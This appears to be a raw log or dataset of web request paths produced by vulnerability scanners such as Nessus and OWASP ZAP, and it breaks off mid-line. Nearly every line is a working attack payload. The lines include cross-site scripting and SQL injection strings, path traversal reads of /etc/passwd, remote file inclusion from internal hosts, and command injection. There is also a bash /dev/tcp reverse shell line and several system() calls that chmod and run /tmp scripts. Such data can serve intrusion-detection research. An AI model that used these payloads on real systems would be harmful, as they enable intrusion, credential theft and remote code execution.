content=\"testbnli=1975\">\n/examples/jsp/error/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/examples/jsp/sessions/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/javascript/shipping.exe\n/en-us/dda2qr7j.pl?<script>cross_site_scripting.nasl</script>\n/cheech & chong's still smokin' 1983 dvdrip kvcd jamgood(tus release)/\n/n9xlumt5.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/scripts/src/redirect.php\n/hrttz9fj.x?<script>document.cookie=\"testtbjy=7334;\"</script>\n/help.php?q=\\x0auname >q83261242 #\n/script/ident/loginmodif.php?path_inc=@rfiurl\n/examples/jsp/sessions/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/projects/1/repository/annotate?rev=`0<&95-;exec 95<>/dev/tcp/192.168.202.96/32418;sh <&95 >&95 2>&95`\n/examples/jsp/checkbox/profil.php?id=1 <script>foo</script>\n/javascript/vm.exe\n/uvazfs7p.do?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/top.php?stuff=\"&rm,q22827927&rem,\n/examples/jsp/cal/tombstone.cfm?profileid=<script>foo</script>\n/top.php?stuff=';rm\\x09q65186773\\x09#\n/zroo33l4.dll?<script>document.cookie=\"testiklc=904;\"</script>\n/openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;\n/o1zj4u9v.aspx?<script>document.cookie=\"testabrn=6368;\"</script>\n/cgi-perl/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/9kr0ih0v.asp?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/recordings/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/n1afe1y6.idc?<script>cross_site_scripting.nasl</script>\n/javascript/.htpasswd.sfish/\"`true`\"\n/?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/help.php?q=&ver\\x09>q45426544&rem\\x09\n/javascript/flags.exe\n/main.php?logout=\"|ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/cgi-local/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/examples/jsp/jsp2/el/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/m5103snj.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/include/default_header.php?script_path=http://192.168.202.96:8080/txenjrxf3?\n/examples/jsp/cal/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/en-us/account/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/main.php?logout=\"&rm,q91889862&rem,\n/mod.php?mod=orders&mode=view&sb=1&so=a&fb=&fs=\"><script>alert(\"411725577544\");</script><\"3\n/j4oqyvga.php3?<script>cross_site_scripting.nasl</script>\n/169okeyj.x?<script>document.cookie=\"testxeoi=3573;\"</script>\n/q703m78q.do?<script>document.cookie=\"testvowq=604;\"</script>\n/examples/jsp/jsp2/jspx/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/examples/jsp/checkbox/nslookup.cgi?query=localhost;id&type=any&ns=\n/t578vqea.jspa?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/ygkjkngd.mscgi?<script>document.cookie=\"testnago=4518;\"</script>\n/help.php?q='&del\\x09q13548493\\x09#\n/if69ddo1.do?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/examples/servlets/servlet/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/o6ebbirj.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iktok2bw.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top_onlinesubscription/\n/i2n4v4rl.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='\\x0arm q22265597 #\n/help.php?q=';rm q86575497 #\n/cgibin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/top.php?stuff=\"&ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/g8nu2yy7.do?<script>cross_site_scripting.nasl</script>\n/scripts/login.aspx\n/subscriptions.shtml\n/javascript/michael.exe\n/aj3pf49c.dll?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/examples/jsp/error/bb-hist.sh?histfile=../../../../../etc/passwd\n/9o6g5vkn.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/tag-\"kevin/\n/main.php?logout=&ver >q42366548&rem \n/cgi-exe/fileseek.cgi?foot=;cat /etc/passwd&head=\n/examples/jsp/jsp2/jspx/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/x7pclv4s.html?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/cgi-exe/.passwd\n/examples/jsp/jsp2/el/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/i686v90l.jsp?<script>document.cookie=\"testfutf=1550;\"</script>\n/examples/jsp/checkbox/pfdispaly?../../../../../../etc/passwd\n/main.php?stuff=\";sleep\\x0911\\x09#\n/examples/servlets/servlet/main.php?g2_itemid=../../../../../license\\x00\n/m4kkjf8l.idc?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/main.php?logout=\"\\x0adel q33271476 #\n/investment - o'neil, william j/\n/javascript/soapmonitor.exe\n/examples/jsp/jsp2/el/index.php?id=urjhxcl19w'\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/ezgnbzqprg.sh'); function v\n/en-us/odzk29aa.htm?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/m4kkjf8l.php?<script>document.cookie=\"testyglc=8988;\"</script>\n/en-us/h5sc3gxy.cfc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/docs.php?doc=../jpgraph-1.12.1/docs/index\n/top.php?stuff=\"ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/scripts/index.php?src=1&_common=1&time=1331908883&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/9o6g5vkn.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/orig.exe\n/issue/createissue.aspx?rtcdescription$radeditor1=1><script>alert(414046083539);</script>\n/en-us/w4996nr0.pl?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/javascript/htpasswd.out\n/main.php?logout=\"ver\\x09>q95413462&rem\\x09\n/zqqemp6j.php?<script>cross_site_scripting.nasl</script>\n/z_user_show.php?method=showuserlink&class=<script>javascript:alert(document.cookie)</script>&rollid=admin&x=3da59a9da8825&\n/en-us/oie504mr.cfc?<script>document.cookie=\"testtpby=7052;\"</script>\n/bl8sefdm.do?<script>cross_site_scripting.nasl</script>\n/m2fpztty.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/examples/servlets/servlet/index.php?id='\n/manager/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/etc\\/passwd\n/scripts/rih28haesl0j.cfm\n/top.php?stuff=\"ping -w 9000 -n 1 4.3.2.1|rem \n/manager/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/main.php?logout=';uname\\x09>q79392194\\x09#\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>','0','0');waitfor delay '0:0:15';--\n/javascript/ansi.exe\n/zroo33l4.fts?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\\x00\n/d765w06j.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='del\\x09q23771746\\x09#\n/examples/jsp/jsp2/el/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/examples/jsp/cal/simple/view_page?mv_arg=|cat /etc/passwd|\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/9ko6m4c8.jspa?<script>document.cookie=\"testylik=3403;\"</script>\n/main.php?stuff=\\x0auname\\x09>q88176934\\x09#\n/ewc3rz1l.do?<script>document.cookie=\"testkgqo=204;\"</script>\n/nmw0do67.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/uc3w3bdi.idc?<script>document.cookie=\"testxllt=9940;\"</script>\n/recordings/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/comments.php?scriptpath=http://192.168.202.118:8080/ghl9il??\n/ydexw8by.php?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/j4oqyvga.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.passwd.ppt\n/wanted.../\n/help.php?q=\"&ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/examples/jsp/cal/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/en-us/odzk29aa.do?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/cgi-bin/javascript.php?abs_path=/etc/passwd\\x00\n/prescription-viagra/\n/cgi-bin/post32.exe|dir c:\\\\\n/main.php?stuff=\"rm q63222197&rem \n/examples/jsp/sessions/cart32.exe\n/main.php?stuff='|sleep 11 #\n/bmeun223.x?<script>document.cookie=\"testhhwu=7044;\"</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=q13275358&scr_height=&scr_width=\n/examples/jsp/sessions/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/javascript/store.exe\n/zln2hm2z.jspa?<script>document.cookie=\"testblcp=8120;\"</script>\n/main.php?logout=\"ping;-w;9000;-n;1;4.3.2.1&rem;\n/javascript/windows.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+c0+31+db+89+45+f0+8b+46+3c+8b+44+06+78+01+f0+83+c0+18+8b+10+89+55+f4+89+f2++>>esbq\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+50+45+00+00+4c+01+03+00+00+00+00+00+00+00+00+00+00+00+00++>>esbq\n/scripts/index.php?site=../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/scripts/qg9h0c0svvat.cfm\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/sessions/search.php?submit=true&search=');\n/d5a5renl.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ylrvly9nh_pf.cgi\n/news/scripts/news_page.php?script_path=http://192.168.202.118:8080/2aibfaczmac8??\n/javascript/bug.exe\n/webdav/phprun.php?cmd=c:\\calc.exe\n/javascript/print.exe\n/en-us/account/store.php?crn=42'&action=show&show_products_mode=cat_click\n/h5sc3gxy.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/n9xlumt5.kspx?<script>cross_site_scripting.nasl</script>\n/pam-script_0/\n/bin/fileseek.cgi?foot=;cat /etc/passwd&head=\n/help.php?q=\"&del\\x09q66498964&rem\\x09\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/ghl9il?\n/top.php?stuff='\\x0dsleep\\x0910\\x09#\n/byrg33fw.pl?<script>document.cookie=\"testexuu=5340;\"</script>\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908728,0x3a,1791311072),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/library/classes/document.class.php\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+04+00+00+00+00+00+00+00+00+40+00+00+00+04+00+00+00+00+00+00+02+00++>>ctdn\n/d765w06j.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/fgos1sb1c1tr.php\n/help.php?q=|ping;-w;11000;-n;1;4.3.2.1|rem;\n/examples/jsp/cal/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/0w155a7c.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mlog.html?screen=/etc/passwd\n/scripts/calendar.php?month=' union select 1,1,'1331904224','calendarix_month_sql_injection.nasl',1 #\n/en-us/n9xlumt5.cgi?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/d5a5renl.dll?<script>cross_site_scripting.nasl</script>\n/recordings/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs'=sleep(4)='\n/news/scripts/news_page.php?script_path=@rfiurl?script_path=@rfiurl?\n/vwmg565s.cfc?<script>cross_site_scripting.nasl</script>\n/aj3pf49c.php3?<script>document.cookie=\"testnofv=4170;\"</script>\n/en-us/s7qus4g3.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/index.php?id='union/**/select/**/0,0,927895779,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/jw64yq8u.html?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/comments.php?scriptpath=http://cirt.net/rfiinc.txt??\n/xsqln7eb.mscgi?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/top.php?stuff=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+10+00+00+00+20+00+00+00+02+00+00+00+16+00+00+00+00+00+00+00+00+00++>>esbq\n/scripts/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/scgi-bin/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/examples/servlets/servlet/cal_week.php?op=week&catview=999'\n/fpnpp5zg.cfm?<script>document.cookie=\"testyias=101;\"</script>\n/j4oqyvga.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/msmmask.exe?mask=/nessus1788090238.asp\n/d44uk9h2.cfc?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/examples/jsp/jsp2/jspx/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/main.php?logout=&ver;>q28829334&rem;\n/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/2aibfaczmac8??\n/examples/jsp/checkbox/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/main.php?logout=';uname >q85646861 #\n/33y9gcqq.dll?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/examples/jsp/num/webplus.exe?script=webplus_install_path.nasl\n/cgibin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/javascript/profile.exe\n/phpmyadmin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331923195')</script>\n/cgi-local/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/search.php?searchstring=<script>foo</script>\n/zmvq66jy.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-win/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/examples/jsp/jsp2/jspx/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?stuff=\\x0duname >q58155569 #\n/top.php?stuff=';sleep\\x097\\x09#\n/but i'm with the band/\n/manager/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/main.php?logout=\"ver&rem,\n/cgi-914/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/jujgxwav.dll?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/gy23xnjq.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/x7pclv4s.kspx?<script>document.cookie=\"testiulz=3709;\"</script>\n/0z575z74.php?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/help.php?q=\"|ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/examples/jsp/jsp2/el/newsscript.pl?mode=admin\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --\n/manager/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/javascript/database.exe\n/scripts/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/examples/jsp/checkbox/faq.php?action=&type=view&s=&id=-1' union select 0,1622415956,0,0,0,0,0--\n/examples/jsp/sessions/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/main.php?stuff=\"&rm;q68954445&rem;\n/top.php?stuff=\"&rm\\xa0q83547895&rem\\xa0\n/examples/servlets/servlet/include/sql.php?include_path=/etc/passwd\\x00\n/phpmyadmin/css/phpmyadmin.css.php?globals[cfg][themepath]=/etc/passwd\\x00&theme=passwd\\x00\n/m4kkjf8l.fts?<script>document.cookie=\"testyglc=8988;\"</script>\n/javascript/facebook.exe\n/main.php?logout=\"rm q44662571 #\n/main.php?logout=&ver\\x0b>q19662963&rem\\x0b\n/webadmin.php?show=/etc/passwd\n/examples/jsp/sessions/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/examples/jsp/error/myevent.php?myevent_path=/etc/passwd\\x00\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/raanw4ia.pl?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=&ver\\x0b>q53983752&rem\\x0b\n/d44uk9h2.php3?<script>document.cookie=\"testmybc=2088;\"</script>\n/phpmyadmin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/examples/jsp/num/index.php?entry='\n/forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/examples/jsp/colors/pfdispaly.cgi?../../../../../../etc/passwd\n/edzaia0i.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6qbynt4f.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.htaccess/\"`uname`\"\n/main.php?logout=\"&ver&rem;\n/examples/jsp/sessions/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331908738','5'--\n/ann angel daddy's girl/\n/top.php?stuff=\"&uname #\n/domscripting/\n/uvazfs7p.x?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/examples/jsp/jsp2/el/wiki.php/<script>foo</script>\n/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini\n/examples/jsp/jsp2/elsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/x2gyorli.do?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,539900350 -- \n/edv3mapy.php3?<script>cross_site_scripting.nasl</script>\n/8x6w469u.cfm?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/uvazfs7p.cfm?<script>document.cookie=\"testwtbo=4831;\"</script>\n/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>\n/cgi-bin/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/a0imiuf1.php3?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/uvazfs7p.php?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/manager/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/subscriptions.php3\n/l4fz1dqw.pl?<script>cross_site_scripting.nasl</script>\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331905087\n/cgibin/gw5/gwweb.exe?htmlver=aaa&get-context\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.nsf\n/scripts/nryr3lvrjnwx.pl\n/ddoworrl.dll?<script>document.cookie=\"testvlau=8517;\"</script>\n/examples/jsp/jsp2/jspx/install.php?newlang=../../cpg_error.log\\x00\n/phpmyadmin/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/cacti/shopper.cgi?newpage=../../../../../../etc/passwd\n/de3v2dd9.htm?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=&ver\\x0c>q57337183&rem\\x0c\n/help.php?q=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/examples/jsp/colors/htmlscript?../../../../../../../../../etc/passwd\n/l4fz1dqw.x?<script>cross_site_scripting.nasl</script>\n/manager/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/examples/jsp/error/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/top.php?stuff=';uname >q56884429 #\n/7u1pb2xi.dll?<script>document.cookie=\"testlwwz=718;\"</script>\n/examples/jsp/jsp2/el/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/examples/servlets/servlet/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/scripts/simple/view_page?mv_arg=|cat /etc/passwd|\n/ewc3rz1l.cfm?<script>document.cookie=\"testkgqo=204;\"</script>\n/\\xd0\\x9a\\xd0\\xbe\\xd0\\xbc\\xd0\\xbf'\\xd1\\x8e\\xd1\\x82\\xd0\\xb5\\xd1\\x80\\xd0\\xbd\\xd1\\x96_\\xd1\\x96\\xd0\\xb3\\xd1\\x80\\xd0\\xb8/\n/itemdescription/\n/scripts/index.asp?user='\n/iajtej82.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?stuff=\"ver&rem,\n/d44uk9h2.html?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/javascript/level.exe\n/examples/jsp/sessionsfaq.php?skin=../../admin/manager&tplpath=admin\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/ysooqnjtxq0;echo|awstats268243.txt\n/examples/jsp/error/directory.php?dir=;cat /etc/passwd\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/wseyjvsrei.sh+>+/dev/null+&').\"]=1\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/llumt7msyau5y?\n/javascript/cnt.exe\n/ie5macscripting/\n/xss_research/\n/index.php?config[\"sipssys\"]=http://192.168.202.118:8080/2aibfaczmac8?\n/prodlist.asp?brand=<script>alert(414555596928);</script>\n/main.php?stuff=\"&ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/x7pclv4s.x?<script>document.cookie=\"testiulz=3709;\"</script>\n/recordings/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/scripts/siteframe.php?local_path=macros/100-siteframe.macro\\x00\n/main.php?logout=\"rm q29314884 #\n/javascript/header.exe\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/tvzjwzrsfg0;').\"]=1\n/zln2hm2z.nsf?<script>document.cookie=\"testblcp=8120;\"</script>\n/phpmyadmin/listrec.pl?app=qmh-news&template=;ls /etc|\n/examples/jsp/jsp2/jspx/index.php?cid='\n/manager/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/manager/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/javascript/fc.exe\n/examples/jsp/error/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/manager/php.cgi?/etc/passwd\n/main.php?logout=\"&del;q41289753&rem;\n/zqqemp6j.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nuh3zirz.cfc?<script>cross_site_scripting.nasl</script>\n/u95h6ymu.cfm?<script>document.cookie=\"testkhwc=4028;\"</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/dphbymftnm.sh').\"]=1\n/examples/servlets/servlet/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/forums/browse.php?fid=3&tid=46&go=<script>javascript:alert('vulnerable');</script>\n/</title><script>alert(\"xss\")</script>\n/javascript/deny.exe\n/0u75ldxq.cfm?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"|ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/news.php?config[script_path]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/scriptinglanguagesdejanews/\n/scripts/index.php?src=1&_common=1&time=1331919221&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/fbpansgiuv;\"\n/noscripthome-11/\n/examples/jsp/error/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/javascript/php.exe\n/0z575z74.dll?<script>document.cookie=\"testuhsv=9753;\"</script>\n/33y9gcqq.cgi?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/fc9t54l7.x?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332010398\n/examples/jsp/colors/store.php?crn=42'&action=show&show_products_mode=cat_click\n/controlmanager/cgi-bin/dm_autologin_cgi.exe?-v\n/examples/jsp/jsp2/jspx/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/search.jsp?q=%\"<script>alert(1331908697)</script>\n/scripts/eezuu7xc7ge3.sh\n/main.php?stuff=\"|ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/cacti/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/top.php?stuff='&del q61677415 #\n/index.php?post=../config/password\n/faq.php?action=&type=view&s=&id=-1' union select 0,218106892,0,0,0,0,0--\n/cacti/cwmail.exe\n/main.php?stuff=\"ping -w 8000 -n 1 4.3.2.1|rem \n/examples/servlets/servlet/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/javascript/transactions.exe\n/zuihld5m.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.htpasswd.sfish/'`uname`'\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1415485766,1622819751,1,1,1,1,1--&blogid=1\n/cgi-914/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/scripts/wx4z4gedhl0l.shtml\n/turner's picture/\n/en-us/w4996nr0.idc?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/help.php?q='\\x0arm q56533456 #\n/zln2hm2z.cgi?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/ywaxntrx.nsf?<script>cross_site_scripting.nasl</script>\n/phpmyadmin//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+72+61+72+79+41+77+73+32+5f+33+32+2e+64+6c+6c+00+5d+64+8b+1d+30+00+00+00+8b++>>esbq\n/5qnlm5z2.fts?<script>document.cookie=\"testsixi=8451;\"</script>\n/i don't need a man/\n/javascript/rules.exe\n/php/php.exe?c:\\boot.ini\n/examples/jsp/error/includes/config.php?relative_script_path=http://xxxxxxx\n/javascript/zend.exe\n/o35zot2r.mscgi?<script>cross_site_scripting.nasl</script>\n/ntpasswd/\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/scripts/index.php?edit=nonexistant1102310993\n/javascript/logins.exe\n/<script>cross_site_scripting.nasl</script>.php\n/ywaxntrx.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/ddoworrl.jspa?<script>document.cookie=\"testvlau=8517;\"</script>\n/jw64yq8u.do?<script>document.cookie=\"testylfu=1313;\"</script>\n/main.php?stuff='\\x0arm q31711746 #\n/thvgjebp.exe\n/t3af3tdz.pl?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/directory.php?dir=;cat 